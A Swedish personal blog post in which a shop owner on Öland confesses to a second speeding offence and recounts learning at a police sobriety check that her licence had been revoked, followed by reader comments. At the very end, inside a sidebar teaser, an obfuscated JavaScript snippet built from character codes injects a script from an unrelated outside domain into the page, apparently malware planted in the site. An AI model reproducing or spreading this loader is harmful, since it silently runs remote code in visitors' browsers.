Ett ärligt erkännande, tagen av pappa-blå, IGEN!

10255131_714486561923174_1973731455822476926_n

 

God morgon! Idag är en såndär dag som man undrade om det inte hade varit bättre att stanna kvar i sängen…. Jävla skit dag! Igår var ju inte heller någon toppen dag, och jag hade inställningen att jag idag skulle vakna upp med en bättre inställning. Ni vet Ny dag, nya möjligheter. Men icke! Inte riktigt medvind just nu. Men det är ju precis så livet är, som en bergodalbana. Jag hade kunnat ge skenet av att allt är toppen och bäddat in bloggen i små rosa moln, men då hade det inte varit jag! Ibland händer saker i ens närhet som man inte riktigt kan påverka. Man ser sina nära drabbas av någonting fruktansvärt och man kan inte annat än att finnas där som ett stöd! Jag hatar den där maktlöshets känslan som då infinner sig.

10247432_714486508589846_8147664466578183554_n

 

För att göra saken lite bättre så har vädergudarna ställt in skyfall över normalt sett soliga Öland. Det är bra för alla bönder och jordbruket. MEN inte för My’s Blommor. Vem vill åka och stor handla trädgårdsväxter om det vräker ner från skyn? Inte jag iallfall 😉

10153997_714486535256510_1052269961644963770_n

 

Min kollega Maria pysslar lite inför påsk. Vi passar på att vara extra kreativa och få mycket gjort i butiken då det inte är mycket kunder hos oss just nu….

 

10174950_714486478589849_8645165690503772427_n

Dessa ursnygga Havaianas ska få följa med mig till Rhodos =)  Det är ju faktisk positivt, snart är det semester =) Wiiiii vad jag längtar! Ni hittar sandalerna HÄR .

1978776_714058791965951_5773254433047002634_n

 

Nu ska denna normalt sett glada & positiva tjej göra ett erkännande

Som vissa av er vet så figurerade jag i höstas på löpet med en artikel att ”Ensam mamma My söker privat chaufför”

Jag fick då återkallat körkort. Inte pga ratfylla eller någonting annat helt oacceptabelt. För mig gäller nolltolerans vad gäller alcohol i kombination med bilkörning!

Jag körde helt enkelt för fort, väldigt mycket för fort. Jag erkände det och försvarade mig inte. Det var ju precis så det var. jag har många bollar i luften, alltid påväg någonstans, möte, jobb osv. Jag jobbar delvis i Amsterdam, pendlar till Stockholm, och spenderar ca 6000 mil om året i min bil. Det är ingen ursäkt, bara en förklaring till att jag försöker att hinna med så mycket som möjligt och då haft svårt att hålla hastigheten.

Nu ca två månader efter att jag fått tillbaka mitt körkort så händer det IGEN! Jag blev stoppad utav en polisbil som då har mätt upp min hastighet till 100km/h på 70 väg! SATAN I GATAN så dumt! alltså skjut mig! Jag kan ju knappast säga någonting till mitt försvar, denna gången heller! Dom talar om att jag ”hade tur” och att jag klarar mig precis då det hade behövt vara 101km/h för fort för att dom skulle ha tagit mitt körkort på plats. jag ställer lite försiktigt frågan, är det säkert? Jag har nämligen precis varit av med mitt körkort. Polismannen svarar mig då att det kan eventuellt ha en negativ påverkan men att det inte är dom som tar det beslutet utan transportstyrelsen. Så jag får vänta och se. Nu har jag bevakat min post och varje dag haft en klump i magen över ovissheten OM det nu ska ligga ett brev ifrån transportstyrelsen.

I torsdags innan jag skulle flyga till Stockholm så kör jag över till Öland och butiken, men passar på att köra ner till Ölandsköpstad för att göra ett ärende på apoteket. Jag stänger av bilen, kliver ur och låser. Humöret är på topp, solen skiner och jag ska snart flyga upp till Maggan.  Då från ingenstans kommer det fram en ganska läskig man som jag tror ska råna mig på min handväska eller något och säger -nykterhetskontroll. SHIT vad rädd jag blev! Förlåt svarade jag, men  du skrämde mig verkligen. Han skrattar lite och förklarar att dom är sevilklädda för att kunna göra nykterhetskontrollerna då bolaget ligger i närheten av mitt mål, apoteket. Samtidigt som jag blåser så slår mig tanken att, får man ens stanna någon som går för en nykterhetskontroll? Hmm!  Han ber om mitt körkort, jag har då bara passet med mig och han slår då på reg nr på mi bil och pratar med kollegor via kom-radion. Det kommer fram en polis till, samtidigt som det börjar bli en mindre folksamling. Svaret han får i polisradion gör att mitt hjärta stannar upp för ett slag och hela jag fryser till is! Svaret är att fröken Martens har återkallat körkort! WHAT! Polisen blir genast irriterad då han precis ställt mig frågan om jag har körkort! Men, jag har körkort, jag har inte fått något brev ifrån transportstyrelsen hävdar jag! Jag förklarar att jag har kört för fort och berättar det som jag precis skrivit till er här ovanför. Men trovärdigheten ifrågasätts stark, både för att jag har kört för fort tidigare, och för att jag har varit av med körkortet tidigare. Jag känner att kinderna blossar och den lilla folksamlingen har gått från liten till större. Shit vad pinsamt! Men detta kan ju ändå inte vara sant! Jag skulle ALDRIG köra olovligt! Vad innebär olovlig körning! Många tankar snurrar i huvudet! Sekunderna går extremt långsamt, minuterna känns som en evighet! Men tillslut så får dom ett var via polisradion att jag INTE har fått detta brevet, eller på korrekt svenska delgivningskvittot som alltså skulle informerat mig om att jag får återkallat körkort, igen. Vad vad det jag sa, tänkte jag för mig själv! Men i min position är man inte särskilt kaxig. hade jag kunnat sjunka genom jorden så hade jag definitivt gjort det. Polisen frågar om jag har någon som kan komma och hämta mig och bilen. Nej svarar jag lite fundersamt…. Snälla som dom är så erbjuder dom mig skjuts upp till My’s Blommor. Så min bil körd utav en polisman, en polisbil och jag gör en tjusig entre precis utanför butiken, som dessutom ligger precis bredvid mitt x restaurang. Snacka om en pinsam entre! Jag tackar artigt för skjutsen, men vill bara att dom ska köra härifrån för att slippa dra på mig mer uppmärksamhet än nödvändigt! Jag får skriva på ett delgivningskvitto som nu informerar mig om mitt körkortstillstånd.

Jaha, hur f’n löser jag detta. Jag bor i Kalmar, lämnar Ludvig hos dagmamma på Öland, åker tränar på gymmet i Kalmar, jobbar på Öland, kör ut buden i butiken. Börjar inom ett par veckor pendla till Amsterdam igen, där jag verkligen behöver min bil, eller närmare bestämt körkortet! Suck! Så just nu planerar jag en eller två dagar i taget. Mitt liv är minst sagt komplicerat! Självförvållat? Absolut! Helt och hållet mitt egna fel! Inga ursäkter på den. Men denna fartdåren är ett minne blått! Jag kommer ALDRIG att utsätta mig för denna extremt opassande situation! Jag vet att ni kanske inte tror mig, då jag själv brukar uttrycka mig ”En gång är ingen gång, men två gånger är två gånger för mycket” Men jag ska bevisa det både för er och för mig själv, med tiden 😉

 

Jag hade tänkt undanhålla detta för er och alla andra som jag skulle kunna tänkas dölja det för, då det är extremt pinsamt! Men samtidigt så  har jag lovat er en ärlig blogg, så lika bra att säga som det är. Dessutom har ”någon” ifrån folksamlingarna tipsat pressen så flera journalister har redan fått ta del utav denna situationen.

Nu ska jag återgå till butiken. Jag är inte långtifrån felfri och inte heller på topp just nu. men det är väl ändå lite tjusningen med livet, att det går upp och ner. Imorgon kanske jag är mitt positiva glada jag igen=)

Varma kramar / My martens

 

 

15 Komentarer

 1. Nu gör vi så här:
  Jag ställer upp. Jag har körkort, ingen bil. Bor i Borgholm.
  Maila mig för mitt nummer så pratar vi.

 2. Gillar din ärlighet och att du delar med dig av både med och motgångar. Men fy vad jag tycker synd om dig! Hela vardagen vänds ju upp och ner när man plötsligt står utan körkort.. ? Även om det är ”självförvållat” är det ju maximal otur att polisen står där just då… Efter allt det här måste det ju hända lite positiva saker för dig nu, jag håller tummarna för det iallafall!
  En stor ”tröst-kram” från mig

 3. Nu gör vi så här:

  Jag ställer upp. Jag har körkort, ingen bil. Bor i Borgholm.

  Maila mig för mitt nummer så pratar vi.

 4. Å nej vilken otur ? körkort är verkligen något man är beroende av. Usch så jävla tråkigt.
  Vet hur lätt det är att gasa lite för mycket. Kommer lösa sig för dig även om det är ett helvete just nu. Man är inte mer än en människa och ibland måste man göra samma ”misstag” fler gånger tills man fattat.

 5. Gillar din ärlighet och att du delar med dig av både med och motgångar. Men fy vad jag tycker synd om dig! Hela vardagen vänds ju upp och ner när man plötsligt står utan körkort.. 🙁 Även om det är ”självförvållat” är det ju maximal otur att polisen står där just då… Efter allt det här måste det ju hända lite positiva saker för dig nu, jag håller tummarna för det iallafall!
  En stor ”tröst-kram” från mig

 6. Å nej vilken otur 🙁 körkort är verkligen något man är beroende av. Usch så jävla tråkigt.
  Vet hur lätt det är att gasa lite för mycket. Kommer lösa sig för dig även om det är ett helvete just nu. Man är inte mer än en människa och ibland måste man göra samma ”misstag” fler gånger tills man fattat.

 7. Synd?! Näe du fröken My och ni som kommenterat innan mig, synd är det om de som DRABBAS av fartdårar i trafiken. Hastighetsbegränsningar finns till för en anledning, och att du just varit av med kortet gör att jag starkt tvivlar på om du kommer få tillbaka det inom en snar framtid.
  Du är ju en form av yrkeschaufför som kör så mycket, därför BORDE du veta bättre och köra efter förstånd! Nån som behöver sitt kort i tjänsten e ju bra DUM som riskerar det!! 100 på 70 väg? Ja men hur mycket tid tror du att du egentligen spar på att köra för fort? Mycket mindre än du tror!
  Tyckte personligen att de gjort rätt som plockat ditt kort för du är högst olämplig som chaufför som inte kan hålla hastighet, lika olämplig som en rattfyllerist osv..
  Med vänlig hälsning, en som vet vad det innebär att ha fartdårar på vägen.. Det ger inte sällan oss andra änglar i himlen, änglar som rycks bort för tidigt för att någon anser sig har rätt att braka på över hastighetsbegränsningen…

  • Hej Jenny! Jag håller helt och hållet med dig i vad du skriver. Det är ingen annans fel än mitt eget. Jag står alltid för vad jag gör/gjort oavsett om det är bra eller mindre bra gjort utav mig. Jag hoppas däremot att jag kanske kan väcka en och annan tankeställare till flera fartdårar därute =) Jag kommer att få tillbaka mitt körkort om två månader. Sen precis som jag skrev i mitt inlägg så kommer jag att med tiden visa att jag lärt mig en läxa och håller hastigheten. Ha en fin dag! Kramar my

 8. Synd?! Näe du fröken My och ni som kommenterat innan mig, synd är det om de som DRABBAS av fartdårar i trafiken. Hastighetsbegränsningar finns till för en anledning, och att du just varit av med kortet gör att jag starkt tvivlar på om du kommer få tillbaka det inom en snar framtid.

  Du är ju en form av yrkeschaufför som kör så mycket, därför BORDE du veta bättre och köra efter förstånd! Nån som behöver sitt kort i tjänsten e ju bra DUM som riskerar det!! 100 på 70 väg? Ja men hur mycket tid tror du att du egentligen spar på att köra för fort? Mycket mindre än du tror!

  Tyckte personligen att de gjort rätt som plockat ditt kort för du är högst olämplig som chaufför som inte kan hålla hastighet, lika olämplig som en rattfyllerist osv..

  Med vänlig hälsning, en som vet vad det innebär att ha fartdårar på vägen.. Det ger inte sällan oss andra änglar i himlen, änglar som rycks bort för tidigt för att någon anser sig har rätt att braka på över hastighetsbegränsningen…

  • Hej Jenny! Jag håller helt och hållet med dig i vad du skriver. Det är ingen annans fel än mitt eget. Jag står alltid för vad jag gör/gjort oavsett om det är bra eller mindre bra gjort utav mig. Jag hoppas däremot att jag kanske kan väcka en och annan tankeställare till flera fartdårar därute =) Jag kommer att få tillbaka mitt körkort om två månader. Sen precis som jag skrev i mitt inlägg så kommer jag att med tiden visa att jag lärt mig en läxa och håller hastigheten. Ha en fin dag! Kramar my

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/